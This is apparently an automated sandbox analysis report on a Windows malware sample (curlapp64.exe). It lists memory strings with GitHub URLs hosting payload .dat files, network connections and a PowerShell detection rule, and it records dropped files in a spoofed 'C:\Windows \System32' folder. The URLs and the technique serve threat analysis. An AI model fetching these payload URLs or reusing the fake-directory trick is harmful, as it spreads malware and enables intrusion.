    Source: curlapp64.exe, 0000000B.00000003.2664909778.000002552EEC0000.00000004.00000020.00020000.00000000.sdmp, curlapp64.exe, 0000000B.00000002.2671597203.000002552EED2000.00000004.00000020.00020000.00000000.sdmp, curlapp64.exe, 0000000B.00000003.2664931093.000002552EED1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/botrunvd01/botdwl/raw/main/botprnt.datQ
    Source: curlapp64.exe, 00000005.00000002.2494596778.0000022DE26CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/botrunvd01/botdwl/raw/main/botprnt.datX
    Source: curlapp64.exe, 0000000B.00000002.2670992217.000002552EEB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/botrunvd01/botdwl/raw/main/botprnt.datd
    Source: curlapp64.exe, 00000005.00000002.2494596778.0000022DE26CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/botrunvd01/botdwl/raw/main/botprnt.datdll5
    Source: curlapp64.exe, 0000000B.00000002.2670992217.000002552EEB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/botrunvd01/botdwl/raw/main/botprnt.datdllZ
    Source: curlapp64.exe, 00000008.00000003.2588031470.0000021656B68000.00000004.00000020.00020000.00000000.sdmp, curlapp64.exe, 00000008.00000002.2588286320.0000021656B68000.00000004.00000020.00020000.00000000.sdmp, curlapp64.exe, 00000008.00000003.2581660737.0000021656B67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/botrunvd01/botdwl/raw/main/botprnt.date-Age
    Source: curlapp64.exe, 00000005.00000002.2494596778.0000022DE26CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/botrunvd01/botdwl/raw/main/botprnt.datl
    Source: svchost.exe, 00000037.00000002.3295722777.000001C2A44E6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000037.00000002.3295341739.000001C2A4445000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000037.00000002.3295341739.000001C2A442B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000037.00000002.3295515594.000001C2A4460000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000037.00000002.3295722777.000001C2A44EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/runvd01/dwl/raw/refs/heads/main/cmn/uamd.dat
    Source: svchost.exe, 00000037.00000002.3295722777.000001C2A44E6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000037.00000002.3295515594.000001C2A444B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000037.00000002.3295341739.000001C2A442B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000037.00000002.3295515594.000001C2A4460000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000037.00000002.3295722777.000001C2A44EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/runvd01/dwl/raw/refs/heads/main/cmn/ucpu.dat
    Source: svchost.exe, 00000037.00000002.3295722777.000001C2A44E6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000037.00000002.3295515594.000001C2A444B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000037.00000002.3295341739.000001C2A442B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000037.00000002.3295515594.000001C2A4460000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000037.00000002.3295722777.000001C2A44EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/runvd01/dwl/raw/refs/heads/main/cmn/ucpusys.dat
    Source: svchost.exe, 00000037.00000002.3295722777.000001C2A44E6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000037.00000002.3295341739.000001C2A4445000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000037.00000002.3295722777.000001C2A44EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000037.00000002.3295341739.000001C2A442B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000037.00000002.3295722777.000001C2A44EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/runvd01/dwl/raw/refs/heads/main/cmn/unv.dat
    Source: svchost.exe, 00000037.00000002.3295341739.000001C2A442B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000037.00000002.3295722777.000001C2A44EA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000037.00000002.3295722777.000001C2A4486000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/runvd01/dwl/raw/refs/heads/main/un2/uusb.dat
    Source: svchost.exe, 00000037.00000002.3295722777.000001C2A44EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/runvd01/dwl/raw/refs/heads/main/un2/uusb.dat9116689160438357301003900111
    Source: svchost.exe, 00000037.00000002.3295722777.000001C2A4486000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/json
    Source: svchost.exe, 00000037.00000002.3295722777.000001C2A4486000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/json2H2
    Source: svchost.exe, 00000037.00000002.3295722777.000001C2A4486000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/json6600
    Source: powershell.exe, 0000002D.00000002.2938384773.0000021FD8097000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
    Source: curlapp64.exe, 00000005.00000003.2483165548.0000022DE26F2000.00000004.00000020.00020000.00000000.sdmp, curlapp64.exe, 00000005.00000003.2494142253.0000022DE26F3000.00000004.00000020.00020000.00000000.sdmp, curlapp64.exe, 00000005.00000002.2494596778.0000022DE26F3000.00000004.00000020.00020000.00000000.sdmp, curlapp64.exe, 00000008.00000003.2588031470.0000021656B68000.00000004.00000020.00020000.00000000.sdmp, curlapp64.exe, 00000008.00000002.2588286320.0000021656B68000.00000004.00000020.00020000.00000000.sdmp, curlapp64.exe, 00000008.00000003.2581660737.0000021656B67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.c
    Source: curlapp64.exe, 00000005.00000003.2483165548.0000022DE26F2000.00000004.00000020.00020000.00000000.sdmp, curlapp64.exe, 00000005.00000003.2494142253.0000022DE26F3000.00000004.00000020.00020000.00000000.sdmp, curlapp64.exe, 00000005.00000002.2494596778.0000022DE26F3000.00000004.00000020.00020000.00000000.sdmp, curlapp64.exe, 00000008.00000003.2588031470.0000021656B68000.00000004.00000020.00020000.00000000.sdmp, curlapp64.exe, 00000008.00000002.2588286320.0000021656B68000.00000004.00000020.00020000.00000000.sdmp, curlapp64.exe, 00000008.00000003.2581660737.0000021656B67000.00000004.00000020.00020000.00000000.sdmp, curlapp64.exe, 0000000B.00000003.2664909778.000002552EEC0000.00000004.00000020.00020000.00000000.sdmp, curlapp64.exe, 0000000B.00000002.2671597203.000002552EED2000.00000004.00000020.00020000.00000000.sdmp, curlapp64.exe, 0000000B.00000003.2664931093.000002552EED1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/botrunvd01/botdwl/main/botprn
    Source: curlapp64.exe, 00000008.00000003.2588031470.0000021656B68000.00000004.00000020.00020000.00000000.sdmp, curlapp64.exe, 00000008.00000002.2588286320.0000021656B68000.00000004.00000020.00020000.00000000.sdmp, curlapp64.exe, 00000008.00000003.2581660737.0000021656B67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/botrunvd01/botdwl/main/botprnZ
    Source: curlapp64.exe, 00000005.00000003.2483165548.0000022DE26F2000.00000004.00000020.00020000.00000000.sdmp, curlapp64.exe, 00000005.00000003.2494142253.0000022DE26F3000.00000004.00000020.00020000.00000000.sdmp, curlapp64.exe, 00000005.00000002.2494596778.0000022DE26F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/botrunvd01/botdwl/main/botprnll
    Source: curlapp64.exe, 00000008.00000002.2588286320.0000021656B4E000.00000004.00000020.00020000.00000000.sdmp, curlapp64.exe, 00000008.00000003.2581660737.0000021656B67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/botrunvd01/botdwl/main/botprnt.dat
    Source: curlapp64.exe, 00000008.00000003.2588031470.0000021656B4B000.00000004.00000020.00020000.00000000.sdmp, curlapp64.exe, 00000008.00000002.2588286320.0000021656B4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/botrunvd01/botdwl/main/botprnt.dat2
    Source: curlapp64.exe, 00000008.00000003.2588031470.0000021656B4B000.00000004.00000020.00020000.00000000.sdmp, curlapp64.exe, 00000008.00000002.2588286320.0000021656B4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/botrunvd01/botdwl/main/botprnt.datL
    Source: curlapp64.exe, 00000005.00000002.2494596778.0000022DE26CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/botrunvd01/botdwl/main/botprnt.dattprnt.dat
    Source: svchost.exe, 00000037.00000002.3293593062.00000000660F4000.00000008.00000001.01000000.00000016.sdmpString found in binary or memory: https://www.gnu.org/licenses/
    Source: svchost.exeString found in binary or memory: https://www.openssl.org/
    Source: svchost.exe, 00000037.00000002.3297407684.00007FF8B83F1000.00000002.00000001.01000000.00000012.sdmp, svchost.exe, 00000037.00000002.3296835275.00007FF8A7C8E000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://www.openssl.org/H
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
    Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
    Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
    Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
    Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
    Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
    Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
    Source: unknownHTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.5:49706 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.5:49712 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.5:49715 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.5:49718 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.5:49724 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.5:49728 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.5:49731 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.5:49751 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.5:49759 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.5:49978 version: TLS 1.2
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8A9312B80 CryptAcquireContextW,CryptImportKey,CryptReleaseContext,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,5_2_00007FF8A9312B80
    Source: cmd.exeProcess created: 64

    System Summary

    barindex
    Malicious sample detected (through community Yara rule)
    Source: Process Memory Space: powershell.exe PID: 7112, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8A7D3A860: DeviceIoControl,GetLastError,55_2_00007FF8A7D3A860
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8A7D11820 WTSGetActiveConsoleSessionId,WTSQueryUserToken,CreateProcessAsUserW,CloseHandle,WaitForSingleObject,CloseHandle,CloseHandle,CloseHandle,CloseHandle,_invalid_parameter_noinfo_noreturn,GetSystemDirectoryW,55_2_00007FF8A7D11820
    Source: C:\Users\user\Desktop\curlapp64.exeFile created: C:\Windows \System32\printui.exeJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeFile created: C:\Windows \System32\printui.exeJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeFile created: C:\Windows \System32\printui.exeJump to behavior
    Source: C:\Windows\System32\cmd.exeFile created: C:\WindowsJump to behavior
    Source: C:\Windows\System32\cmd.exeFile created: C:\Windows \System32Jump to behavior
    Source: C:\Windows\System32\cmd.exeFile created: C:\Windows
    Source: C:\Windows\System32\cmd.exeFile created: C:\Windows \System32
    Source: C:\Windows\System32\cmd.exeFile created: C:\Windows
    Source: C:\Windows\System32\cmd.exeFile created: C:\Windows \System32
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\svcldr64.datJump to behavior
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\winsvcfJump to behavior
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\winsvcf\winlogsvcJump to behavior
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libcurl.dllJump to behavior
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\zlib1.dllJump to behavior
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libcrypto-3-x64.dllJump to behavior
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libiconv-2.dllJump to behavior
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libintl-9.dllJump to behavior
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libssl-3-x64.dllJump to behavior
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libwinpthread-1.dllJump to behavior
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\console_zero.exeJump to behavior
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libpq.dllJump to behavior
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\ucrtbased.dllJump to behavior
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\vcruntime140d.dllJump to behavior
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\x610437.datJump to behavior
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\bav64.exeJump to behavior
    Source: C:\Windows\System32\cmd.exeFile deleted: C:\Windows \System32Jump to behavior
    Source: C:\Users\user\Desktop\dYUteuvmHn.exeCode function: 0_2_00007FF71278ABEC0_2_00007FF71278ABEC
    Source: C:\Users\user\Desktop\dYUteuvmHn.exeCode function: 0_2_00007FF71277B3280_2_00007FF71277B328
    Source: C:\Users\user\Desktop\dYUteuvmHn.exeCode function: 0_2_00007FF71276DBF00_2_00007FF71276DBF0
    Source: C:\Users\user\Desktop\dYUteuvmHn.exeCode function: 0_2_00007FF712788BFC0_2_00007FF712788BFC
    Source: C:\Users\user\Desktop\dYUteuvmHn.exeCode function: 0_2_00007FF712769B200_2_00007FF712769B20
    Source: C:\Users\user\Desktop\dYUteuvmHn.exeCode function: 0_2_00007FF71276A9B00_2_00007FF71276A9B0
    Source: C:\Users\user\Desktop\dYUteuvmHn.exeCode function: 0_2_00007FF71276D1B00_2_00007FF71276D1B0
    Source: C:\Users\user\Desktop\dYUteuvmHn.exeCode function: 0_2_00007FF71276A2C00_2_00007FF71276A2C0
    Source: C:\Users\user\Desktop\dYUteuvmHn.exeCode function: 0_2_00007FF71277EADC0_2_00007FF71277EADC
    Source: C:\Users\user\Desktop\dYUteuvmHn.exeCode function: 0_2_00007FF712762A500_2_00007FF712762A50
    Source: C:\Users\user\Desktop\dYUteuvmHn.exeCode function: 0_2_00007FF712762FD00_2_00007FF712762FD0
    Source: C:\Users\user\Desktop\dYUteuvmHn.exeCode function: 0_2_00007FF7127847D00_2_00007FF7127847D0
    Source: C:\Users\user\Desktop\dYUteuvmHn.exeCode function: 0_2_00007FF71277D7D80_2_00007FF71277D7D8
    Source: C:\Users\user\Desktop\dYUteuvmHn.exeCode function: 0_2_00007FF7127717900_2_00007FF712771790
    Source: C:\Users\user\Desktop\dYUteuvmHn.exeCode function: 0_2_00007FF7127620E00_2_00007FF7127620E0
    Source: C:\Users\user\Desktop\dYUteuvmHn.exeCode function: 0_2_00007FF71277B90C0_2_00007FF71277B90C
    Source: C:\Users\user\Desktop\dYUteuvmHn.exeCode function: 0_2_00007FF7127876B00_2_00007FF7127876B0
    Source: C:\Users\user\Desktop\dYUteuvmHn.exeCode function: 0_2_00007FF712785E640_2_00007FF712785E64
    Source: C:\Users\user\Desktop\dYUteuvmHn.exeCode function: 0_2_00007FF71278A6940_2_00007FF71278A694
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF6CABD89B05_2_00007FF6CABD89B0
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF6CAC0393C5_2_00007FF6CAC0393C
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF6CABD99505_2_00007FF6CABD9950
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF6CABB50405_2_00007FF6CABB5040
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF6CABD92205_2_00007FF6CABD9220
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF6CABB42E05_2_00007FF6CABB42E0
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF6CABF8BC85_2_00007FF6CABF8BC8
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF6CABD7BA05_2_00007FF6CABD7BA0
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF6CAC01BB45_2_00007FF6CAC01BB4
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF6CABEFD185_2_00007FF6CABEFD18
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF6CABC7C705_2_00007FF6CABC7C70
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF6CABEAA285_2_00007FF6CABEAA28
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF6CABC59F05_2_00007FF6CABC59F0
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF6CABB29805_2_00007FF6CABB2980
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF6CABF19B45_2_00007FF6CABF19B4
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF6CABFEAF45_2_00007FF6CABFEAF4
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF6CABEEFD85_2_00007FF6CABEEFD8
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF6CABC7FB05_2_00007FF6CABC7FB0
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF6CABF3FA85_2_00007FF6CABF3FA8
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF6CABEAF605_2_00007FF6CABEAF60
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF6CABF21285_2_00007FF6CABF2128
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF6CABB20F05_2_00007FF6CABB20F0
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF6CAC000405_2_00007FF6CAC00040
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF6CABEEDD45_2_00007FF6CABEEDD4
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF6CABECD805_2_00007FF6CABECD80
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF6CABCDDB05_2_00007FF6CABCDDB0
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF6CABB2F005_2_00007FF6CABB2F00
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF6CAC033E45_2_00007FF6CAC033E4
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF6CABD24D05_2_00007FF6CABD24D0
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF6CABC22005_2_00007FF6CABC2200
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF6CABEF1DC5_2_00007FF6CABEF1DC
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF6CABDD1605_2_00007FF6CABDD160
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF6CABC82F05_2_00007FF6CABC82F0
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF6CABC72905_2_00007FF6CABC7290
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF6CABF52AC5_2_00007FF6CABF52AC
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF6CABFD2A85_2_00007FF6CABFD2A8
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF6CABF92405_2_00007FF6CABF9240
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF6CABD82405_2_00007FF6CABD8240
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF6CABFB24C5_2_00007FF6CABFB24C
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF6CABD67705_2_00007FF6CABD6770
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF6CABC79305_2_00007FF6CABC7930
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF6CABE16305_2_00007FF6CABE1630
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF6CABC75E05_2_00007FF6CABC75E0
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF6CABF87305_2_00007FF6CABF8730
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF6CABFC6805_2_00007FF6CABFC680
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF6CABD86805_2_00007FF6CABD8680
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF6CABCA6705_2_00007FF6CABCA670
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8A933AA525_2_00007FF8A933AA52
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8A93249E05_2_00007FF8A93249E0
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8A9356B505_2_00007FF8A9356B50
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8A934FE305_2_00007FF8A934FE30
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8A933B4E05_2_00007FF8A933B4E0
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8A93604A65_2_00007FF8A93604A6
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8A933A4A45_2_00007FF8A933A4A4
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8A932BA405_2_00007FF8A932BA40
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8A9311C305_2_00007FF8A9311C30
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8A9352B605_2_00007FF8A9352B60
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8A9312B805_2_00007FF8A9312B80
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8A933BE305_2_00007FF8A933BE30
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8A935CEC05_2_00007FF8A935CEC0
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8A9313D505_2_00007FF8A9313D50
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8A934CDD05_2_00007FF8A934CDD0
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8A9353D805_2_00007FF8A9353D80
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8A930F0C05_2_00007FF8A930F0C0
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8A93500D05_2_00007FF8A93500D0
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8A931EFC05_2_00007FF8A931EFC0
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8A9313FE05_2_00007FF8A9313FE0
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8A93574F05_2_00007FF8A93574F0
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8A934A3A05_2_00007FF8A934A3A0
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8A93586705_2_00007FF8A9358670
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8A93316F05_2_00007FF8A93316F0
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8A933F5005_2_00007FF8A933F500
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8A933C7B05_2_00007FF8A933C7B0
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8BA2479445_2_00007FF8BA247944
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8BA242A205_2_00007FF8BA242A20
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8BA24D0805_2_00007FF8BA24D080
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8BA24817D5_2_00007FF8BA24817D
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8BA2477AB5_2_00007FF8BA2477AB
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8BA2415205_2_00007FF8BA241520
    Source: C:\Windows \System32\printui.exeCode function: 35_2_00007FF7ECF410E035_2_00007FF7ECF410E0
    Source: C:\Windows \System32\printui.exeCode function: 39_2_00007FF7ECF410E039_2_00007FF7ECF410E0
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 45_2_00007FF8475F207845_2_00007FF8475F2078
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_6600A23055_2_6600A230
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_6601076055_2_66010760
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_6600981055_2_66009810
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_6600BC9055_2_6600BC90
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_660050A055_2_660050A0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_66019CB055_2_66019CB0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_6600ACD055_2_6600ACD0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_66004CE055_2_66004CE0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_6600DD2055_2_6600DD20
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_6600CD6055_2_6600CD60
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_6600E58055_2_6600E580
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_6600D5A055_2_6600D5A0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_660121B055_2_660121B0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_6828A0B055_2_6828A0B0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_6828C22055_2_6828C220
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_68281C1055_2_68281C10
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_6828350055_2_68283500
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_682926C155_2_682926C1
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8A7CC28C055_2_00007FF8A7CC28C0
